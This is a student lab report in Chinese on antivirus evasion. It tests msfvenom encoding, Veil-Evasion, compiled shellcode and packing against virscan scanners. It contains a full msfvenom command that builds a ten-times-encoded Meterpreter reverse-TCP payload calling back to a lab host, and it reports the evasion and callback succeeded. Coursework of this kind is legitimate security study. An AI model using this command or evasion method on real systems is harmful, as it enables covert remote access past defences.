20155218《网络对抗》Exp3 免杀原理与实践

20155218《网络对抗》Exp3 免杀原理与实践

一、使用msf生成后门程序的检测

(1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下:

1071493-20180403163326097-126185093.png

(2)使用msf时对它多编码1次并进行测试

1071493-20180403164434469-347291846.png
1071493-20180403164549543-2024751554.png
发现能发现的杀软变少;

(3)使用msf时对它多编码10次并进行测试

1071493-20180403170026444-417134699.png

1071493-20180403170021311-630594152.png

编码10次后,发现可以查杀的杀软数量仅仅减少了一个;

二、使用veil-evasion生成后门程序的检测

通过list查看功能,选用22命令1071493-20180407203703236-569177855.png

生成文件:1071493-20180407203711137-742849878.png
测试结果:1071493-20180407203726864-1261642954.png
显而易见,效果并不理想;

三、利用shellcode编写后门程序的检测

  • 使用msf生成一个shellcode;然后运行vs2017生成.exe文件,可见再生成后立刻被360发现;
    1071493-20180408161535278-213690960.png
  • 经过virscan被5个AV扫描出,效果不理想;
    1071493-20180408161653845-807231388.png

    尝试新的方法:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 10 LHOST=192.168.1.104 LPORT=4433 -f c

    1071493-20180408164440896-1800941957.png
    只有两个AV可以查杀,免杀效果不错;
    并成功实现回连;1071493-20180408190659792-1089908787.png

四、软件加壳:

1071493-20180408190702009-908552618.png
软件加壳的效果并不好;

五、遇到的问题:

  1. 1071493-20180408190842073-993378751.png

解决方法:找到错误信息的最后一个文件名,vi编译, 把出错的这行注释(加#)就可以了;

  1. 使用代理安装的,有些包会下载安装失败,可以提前安装,记录下基本过程: veil的包安装

转载于:https://www.cnblogs.com/xzh1996/p/8723601.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值